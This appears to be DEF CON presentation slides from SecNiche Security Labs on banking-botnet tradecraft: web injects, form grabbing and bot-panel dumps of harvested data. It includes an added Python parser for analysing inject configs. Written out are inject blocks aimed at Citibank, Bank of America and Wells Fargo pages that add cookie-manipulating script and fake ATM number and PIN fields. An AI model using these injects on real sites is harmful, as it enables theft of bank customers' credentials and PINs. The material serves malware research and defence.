    set_url https://engine.paymentgate.ru/bpcservlet/BPC/index.jsp* GP
    data_before
    <td><input class="text" type="text" name="user..." value=""></td>
    data_end
    data_inject
    <td class="merchantLogin">[unreadable]</td>
    data_end



Web Injects 



■ Grabbing Account Type 

    set_url https://onlineeast*.bankofamerica.com/*/[path unreadable] GPH
    data_before
    <div class="primaryNavCnt">
    data_end

■ What is meant by GPH flags? 

— Exploitation and infection metrics 

• G - injection will be made only for resources that are requested by GET 

• P - injection will be made only for resources that are requested by POST 

• L - flag for grabbing the content between the data_before and data_after tags, 
inclusive 

• H - same as L, except that the grabbed content does not include the contents of the 
data_before and data_after tags 
Web Injects - Real Time Cases (1) 



    set_url https://web.da-us.citibank.com/cgi-bin/citifi/portal/1/1.do GP
    data_before
    src="/cm/js/branding.js"></script>
    data_end
    data_inject
    <SCRIPT>
    function set_cookie(name, value, expires)
    {
        if (!expires) { expires = new Date(); }
        document.cookie = name + "=" + escape(value) + "; expires=" + expires.toGMTString() + "; path=/";
    }
    function get_cookie(name) {
        cookie_name = name + "=";
        cookie_length = document.cookie.length;
        cookie_begin = 0;
        while (cookie_begin < cookie_length)
        {
            value_begin = cookie_begin + cookie_name.length;
            if (document.cookie.substring(cookie_begin, value_begin) == cookie_name)
            {
                var value_end = document.cookie.indexOf(";", value_begin);
                if (value_end == -1) { value_end = cookie_length; }
                return unescape(document.cookie.substring(value_begin, value_end));
            }
            cookie_begin = document.cookie.indexOf(" ", cookie_begin) + 1;
            if (cookie_begin == 0) { break; }
        }
        return null;
    }
    </SCRIPT>
    data_end
    data_after
    <noscript>
    data_end

Forceful cookie injection into 
Citibank's website to 
manipulate the user's session 
Web Injects - Real Time Cases (2) 



    set_url *bankofamerica.com* GP
    data_before
    <a href="#sitekey" title="View your SiteKey">
    <img src="sas-docs/images/clr.gif" height="1" width="10" border="0" alt="View your SiteKey"></a>
    data_end
    data_inject
    </TD>
    </TR>
    <TR>
    <TD align=left class=textbold valign=top>
    <label for="passcode"><SPAN class="text2">* ATM Number:</SPAN>
    <span class="l12-ada"><br>
    Enter an ATM Number. Your ATM Number must be 16 digits.
    </span></label>
    </TD>
    </TR>
    <TR>
    <TD>
    <input type="password" name="ATMNR" id="ATMNR" class="text1" value="" maxlength="16" size="26">
    data_end
    data_after
    data_end

Injecting HTML content into Bank of 
America's web pages to steal the 
ATM number and the passcode. 

    set_url https://online.wellsfargo.com/signon* GP
    data_before
    <input type="password" name="password"*</td>
    data_end
    data_inject
    <td width="225"><label for="password" class="formlabel">3. ATM PIN</label><br/>
    <input type="password" name="USpass" id="atmpin" size="2" maxlength="14" title="Enter ATM PIN" tabindex="11" accesskey="A"/>
    <br/>&nbsp;</td>
    data_end
    data_after
    data_end



Injecting HTML content in Wells 
Fargo bank to steal user's ATM 
code. 
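A parser for the webinjects.txt block format used in the GPH-flag slide and in the real-time cases above, written as an analyst tool that pulls the targeted URL patterns, HTTP methods, grab/inject mode and injected field names out of a captured config; an added Python example, not from the slides or from any bot, with a constructed config (placeholder host, in the shape of the cases above).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

SECTIONS = ("data_before", "data_inject", "data_after")
FIELD_NAME_RE = re.compile(r'\bname\s*=\s*"?(?P<n>[^"\s>]+)', re.IGNORECASE)


@dataclass
class InjectRule:
    """One set_url block: the URL pattern, its flag letters and the three data_* sections."""
    url: str
    flags: str
    data: Dict[str, str] = field(default_factory=lambda: {s: "" for s in SECTIONS})

    def methods(self) -> List[str]:
        return [m for f, m in (("G", "GET"), ("P", "POST")) if f in self.flags]

    def mode(self) -> str:
        if "H" in self.flags:
            return "grab-exclusive"   # take what lies between the markers, markers dropped
        if "L" in self.flags:
            return "grab-inclusive"   # take what lies between the markers, markers kept
        return "inject"               # put data_inject into the live page at the markers

    def injected_fields(self) -> List[str]:
        """Input names the injected HTML adds, i.e. what the rule is trying to harvest."""
        return FIELD_NAME_RE.findall(self.data["data_inject"])


def parse_webinjects(text: str) -> List[InjectRule]:
    """Parse the set_url / data_before / data_inject / data_after / data_end block format."""
    rules: List[InjectRule] = []
    section = None
    for raw in text.splitlines():
        stripped = raw.strip()
        if section is None:
            if stripped.startswith("set_url"):
                parts = stripped.split()
                if len(parts) < 2:
                    raise ValueError(f"set_url without a URL pattern: {stripped!r}")
                flags = parts[2].upper() if len(parts) > 2 else ""
                rules.append(InjectRule(url=parts[1], flags=flags))
            elif stripped in SECTIONS:
                if not rules:
                    raise ValueError(f"{stripped} appears before any set_url")
                section = stripped
            continue                      # anything else outside a section is ignored
        if stripped == "data_end":
            section = None
        else:
            rules[-1].data[section] += raw + "\n"
    if section is not None:
        raise ValueError(f"unterminated {section} block")
    return rules


def summarize(rules: List[InjectRule]) -> List[dict]:
    """Analyst view: what is targeted, on which methods, in which mode, harvesting what."""
    return [
        {"url": r.url, "methods": r.methods(), "mode": r.mode(), "fields": r.injected_fields()}
        for r in rules
    ]


# Constructed config in the shape of the cases above (placeholder host, not a real bank).
SAMPLE_CONFIG = """\
set_url https://online.example-bank.invalid/signon* GP
data_before
<input type="password" name="password"*</td>
data_end
data_inject
<td><label for="atmpin">ATM PIN</label><input type="password" name="USpass" id="atmpin"></td>
data_end
data_after
data_end
set_url https://online.example-bank.invalid/*/account* GPH
data_before
<div class="primaryNavCnt">
data_end
data_after
</div>
data_end
"""

if __name__ == "__main__":
    for entry in summarize(parse_webinjects(SAMPLE_CONFIG)):
        print(entry)
```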
Form Grabbing 



Form Grabbing 

— It is an advanced technique of capturing information present in forms 




Flow shown in the diagram (web server managed by the bank domain, victim's browser, malicious bot residing in the victim machine, attacker's Command & Control (C&C) server; the diagram's step numbering is not recoverable): 

- Bank serves the login page for account access 

- User fills the form with username/password; the form is submitted for verification 

- Bot hooks the browser and reads the POST request 

- Bot extracts the information, i.e. the complete POST request, and sends it to the C&C server 

- Bot releases the hook after sending the information 

- Browser sends the login credentials to the web server controlled by the bank domain 
Form Grabbing 



Why Form Grabbing ? 

— Keylogging produces a plethora of data 

— Form grabbing - extracting data from the GET/POST requests 

— Based on the concept of hooking and DLL injection 

— No real protection against malware 

Screenshot: login forms targeted by form grabbing: E*TRADE "Secure Log On" (User ID, Password) and Bank of America "Online Banking" sign-in (Online ID, Passcode, with enrollment prompts for the ATM or Check Card number and PIN). 

Form Grabbing 



Harvested data from POST 
requests: Kaspersky's anti-virus 
license key entered by the user 

Harvested Data (bot panel report; "View report (HTTPS request, 205 bytes)"):

    Bot ID:              CLOUD2_7D126CF46522DF69
    Botnet:              ice9
    Version:             1.2.0
    OS Version:          Server 2008 R2 x64 3 SP 1
    OS Language:         1033
    Local time:          07.03.2012 11:05:33
    GMT:                 +0:00
    Session time:        648:59:02
    Report time:         07.03.2012 11:05:39
    Country:             (not captured)
    Comment for bot:     -
    In the list of used: No
    Process name:        C:\Program Files (x86)\Kaspersky Lab\Kaspersky Small Office Security\avp.exe
    User of process:     CLOUD2\Administrator
    Source:              https://auto-activation3.kaspersky.com/en/activate
    Referer:             -
    POST data:           REQUEST_ID=[redacted]  APP_ID=[redacted]  ACT_CODE=[redacted]
Demonstration 



This Data is Not Yours! 

Screenshot: bot-panel dump of stolen credentials grouped by browser (Mozilla Firefox, Opera, Internet Explorer, Google Chrome) and by Windows ("All Browsers"), with one header per victim carrying the bot's IP address, country code, bot ID and timestamp (16.05.2012). 
Conclusion 

Botnets have become more robust and sophisticated 
Significant increase in exploitation of browsers 
HTTP has been used for data exfiltration 
Botnets die hard 



Questions 



Thanks 

DEF CON crew 



SecNiche Security Labs 




